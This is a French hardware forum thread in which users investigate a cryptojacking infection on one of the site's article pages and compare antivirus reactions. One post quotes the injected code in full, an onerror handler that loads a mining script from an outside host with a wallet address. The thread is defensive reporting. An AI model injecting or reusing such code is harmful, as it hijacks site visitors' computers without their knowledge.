EN DIRECT en ligne connexion / inscription
Connexion

Surnom/Pseudo
Mot de Passe :

[ Vous avez perdu votre mot de pass ? | Devenir membre ]

×

Infection de page web sur le test des pâtes thermiques

Aller à la page : 1234  
Poster un nouveau sujetRépondre au sujet
CowcotLand topic RSS feed Surveiller les réponses de ce sujet
Bobblebubble @
Paysan
Paysan

971pts

Inscrit le: 12 janvier 2021
Messages: 540

Navigateur : n.c.
Hors ligne
Message Posté le: 24 juillet 2021 à 21:34  Lien permanent
Répondre en citant
Bonsoir
Nous demandons des volontaires pour tester une page suspecte d'infection virale
2 ont testé positif et 2 ont infirmé.

Il suffira de cliquer sur l'article du test : "Comparatif de pâtes thermiques : 9 modèles testés"
voici le lien : https://www.cowcotland.com/articles/divers/

Voir la réaction de votre antivirus et aller sur discord de cowcotland dans le salon signalement public pour donner le résultat ( nom de l'OS, du navigateur, de l'antivirus , page bloquée ou pas) ou répondre sur ce topic

Merci d'avance de votre collaboration !

Edit 1 : Pour vous inscrire à discord de Cowcotland, MP Eldran64 ! Clin d'oeil

Edit 2 : Selon certains fermiers qui n'utilisent que l'antivirus de windows 10, l'accès à la page infectée fait fonctionner le processeur à 100% dans le processus de leur navigateur. Ce qui permet à penser que la page est infectée par un code de minage ! Donc faîtes attention : l'antivirus de windows 10 n'est pas assez efficace contre ce genre de virus !

Pour ma part, j'accède en ce moment à la page sans blocage mais Norton détecte et neutralise le code malveillant. Après quelques heures, Norton rebloque la page !

Donc beubeu ! quand tu seras revenu de vacances, il y a du boulot ! boulets


Dernière édition par Bobblebubble le 01 août 2021 à 13:28; édité 9 fois
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Old_Bear @
Métayer
Métayer

4344pts

Inscrit le: 03 mai 2015
Age: 76
Messages: 3082
Localisation: Mont Ventoux face Nord
Navigateur : Firefox
Hors ligne
Message Posté le: 24 juillet 2021 à 21:57  Lien permanent
Répondre en citant
Il y a réellement un serveur Discord ?

R5 5600X/RX5700_8Go/16 Go DDR4 3800/3 x SSD M.2 1To
R7 3700X/RX 6700XT_12Go/32 Go DDR4 3600/2 x SSD M.2 1To
R5 3600/RTX 2600_6Go/ 16 Go DDR4 3600/M.2 500 Go
R5 5600G/16 Go DDR4 3200/SATA 500Go
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
fission @
Meuhdérateur
Meuhdérateur

3346pts

Inscrit le: 08 mars 2019
Messages: 2801
Localisation: ile de france
Navigateur : n.c.
En ligne
Message Posté le: 24 juillet 2021 à 22:08  Lien permanent
Répondre en citant
réponse d'une page interdite par kaspersky.

Après examen du code source, il s'agit d'un appel à cloud-miner.de après la deuxième image:

Code:

onerror="
var x=document.createElement('script'); x.setAttribute('src', 'https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean'); document.body.appendChild(x);
window.onload = function() { EverythingIsLife('86QXuVdWxRKHU3RKQnnit1J3ZrJd4n62SLTkyZhT5upULX2Ky6oF2WL6CMVZK448FM6vowu1Ry3c3NNsHuJpgATvG4ovNYv', 'ccl', 20); };
"


Voir le profil de l'utilisateur Envoyer un message privé
Bobblebubble @
Paysan
Paysan

971pts

Inscrit le: 12 janvier 2021
Messages: 540

Navigateur : n.c.
Hors ligne
Message Posté le: 24 juillet 2021 à 22:15  Lien permanent
Répondre en citant
Old_Bear a écrit:
Il y a réellement un serveur Discord ?


oui, officiel cowcotland ! Clin d'oeil

https://discord.com/channels/649294878060052520/695961584949919775
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
bishop28 @
Métayer
Métayer

3980pts

Inscrit le: 06 octobre 2010
Age: 43
Messages: 2444
Localisation: FRANCE bonneval
Navigateur : n.c.
En ligne
Message Posté le: 24 juillet 2021 à 23:05  Lien permanent
Répondre en citant
je n’ai pas accès au discord, il me dit lien invalide.

Même code source que fission, mais l'antivirus de windows 10 ne réagi pas sous firefox 90.0.2 (64 bits).
Sous Microsoft Edge chronium Version 92.0.902.55 (64bits), rien chez moi dans la page source ou l'inspection.

Vous vous moquez de moi parce que je suis différent, je me moque de vous parce que vous êtes tous pareil.
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
Martin_White @
Eleveur bovin
Eleveur bovin

15875pts

Inscrit le: 12 mai 2012
Age: 48
Messages: 7110
Localisation: Orléans
Navigateur : n.c.
Hors ligne
Message Posté le: 24 juillet 2021 à 23:23  Lien permanent
Répondre en citant
Comme vu sur le discord, pas d'anomalie chez moi Neutre

Profil HWBOT

Mes travaux
Voir le profil de l'utilisateur Envoyer un message privé Visiter le site web du posteur » Album Photos
Bobblebubble @
Paysan
Paysan

971pts

Inscrit le: 12 janvier 2021
Messages: 540

Navigateur : n.c.
Hors ligne
Message Posté le: 24 juillet 2021 à 23:36  Lien permanent
Répondre en citant
bishop28 a écrit:
je n’ai pas accès au discord, il me dit lien invalide.

Même code source que fission, mais l'antivirus de windows 10 ne réagi pas sous firefox 90.0.2 (64 bits).
Sous Microsoft Edge chronium Version 92.0.902.55 (64bits), rien chez moi dans la page source ou l'inspection.


Aïe , tu MP Eldran64 pour qu'il te donne le lien d'inscription au serveur de cowcotland officiel !
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Old_Bear @
Métayer
Métayer

4344pts

Inscrit le: 03 mai 2015
Age: 76
Messages: 3082
Localisation: Mont Ventoux face Nord
Navigateur : Firefox
Hors ligne
Message Posté le: 25 juillet 2021 à 02:41  Lien permanent
Répondre en citant
En attendant Discord ...

Norton
Alerte : Une tentative d'intrusion par cloud-miner a été bloquée.
Ordinateur attaquant : cloud-miner.de (202.61.241.56, 443)

Firefox 90.0.2
Windows 10 Pro

R5 5600X/RX5700_8Go/16 Go DDR4 3800/3 x SSD M.2 1To
R7 3700X/RX 6700XT_12Go/32 Go DDR4 3600/2 x SSD M.2 1To
R5 3600/RTX 2600_6Go/ 16 Go DDR4 3600/M.2 500 Go
R5 5600G/16 Go DDR4 3200/SATA 500Go
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Arnaud @
Paysan
Paysan

738pts

Inscrit le: 08 mai 2012
Age: 51
Messages: 202
Localisation: Entre Dunkerque et Calais
Navigateur : Opera
Hors ligne
Message Posté le: 25 juillet 2021 à 06:17  Lien permanent
Répondre en citant
Antivirus windows:

Aucune action.


Navigateur: Opera
Windows 10 famille 21H1
Voir le profil de l'utilisateur Envoyer un message privé
Karlitos @
Saisonnier
Saisonnier

248pts

Inscrit le: 15 décembre 2019
Messages: 168

Navigateur : n.c.
Hors ligne
Message Posté le: 25 juillet 2021 à 06:58  Lien permanent
Répondre en citant
Antivirus Windows
ggogle chrome

aucune detection
Voir le profil de l'utilisateur Envoyer un message privé
reyser @
ConfiguroTractor
ConfiguroTractor

3856pts

Inscrit le: 11 juillet 2012
Messages: 1710
Localisation: Lille
Navigateur : n.c.
Hors ligne
Message Posté le: 25 juillet 2021 à 08:43  Lien permanent
Répondre en citant
j'ai pas d'antivirus....du coup pas d'alertes Cowcot

Marche à contre sens de l'ordre établi
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
Proxysd @
Saisonnier
Saisonnier

57pts

Inscrit le: 03 janvier 2020
Messages: 16

Navigateur : n.c.
Hors ligne
Message Posté le: 26 juillet 2021 à 11:31  Lien permanent
Répondre en citant
Ce n'est pas qu'une suspicion, ce code lance un JS externe de minage de cryptomonnaie. Même si c'est pas un virus en tant que tel, ça va quand même bouffer des ressources CPU si il est activé.

Le plus ennuyeux la dedans, c'est comment se fait-il que se bout de code se retrouve là ? Soit y'a une grosse faille dans CCL que le pirate à exploité, soit pire... c'est quelqu'un de CCL qui l'a mis là...
Voir le profil de l'utilisateur Envoyer un message privé
Le_dodo @
Ouvrier agricole
Ouvrier agricole

484pts

Inscrit le: 16 décembre 2020
Age: 42
Messages: 287
Localisation: 25 rue de la grange au loup
Navigateur : Edge
Hors ligne
Message Posté le: 31 juillet 2021 à 21:16  Lien permanent
Répondre en citant
des news sur ce sujet ?
Voir le profil de l'utilisateur Envoyer un message privé
eldran64 @
Cowcot Team
Cowcot Team

20022pts

Inscrit le: 30 juin 2009
Age: 38
Messages: 7424
Localisation: En Bretagne
Navigateur : Edge
Hors ligne
Message Posté le: 31 juillet 2021 à 21:21  Lien permanent
Répondre en citant
Nope, pas de news et toujours le signalement par mon antivirus

Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
Bobblebubble @
Paysan
Paysan

971pts

Inscrit le: 12 janvier 2021
Messages: 540

Navigateur : n.c.
Hors ligne
Message Posté le: 31 juillet 2021 à 21:33  Lien permanent
Répondre en citant
eldran64 a écrit:
Nope, pas de news et toujours le signalement par mon antivirus


Idem ! Triste
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Poster un nouveau sujetRépondre au sujet
Aller à la page : 1234  
Sauter vers: 
Surveiller les réponses de ce sujet CowcotLand topic RSS feed  

Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum


Sujets similaires
Sujet Auteur Forum Réponses Posté le
Pas de nouveau message Test KFA2 RTX 4070 EX Gamer Pink : la vie est plus belle ... jonh Cartes Graphiques 0 01 décembre 2023 à 15:02
Pas de nouveau message Test carte mère : MSI MEG Z790 ACE MAX, sublime ! SebastienD CPU, Cartes mères, RAM 1 22 novembre 2023 à 10:29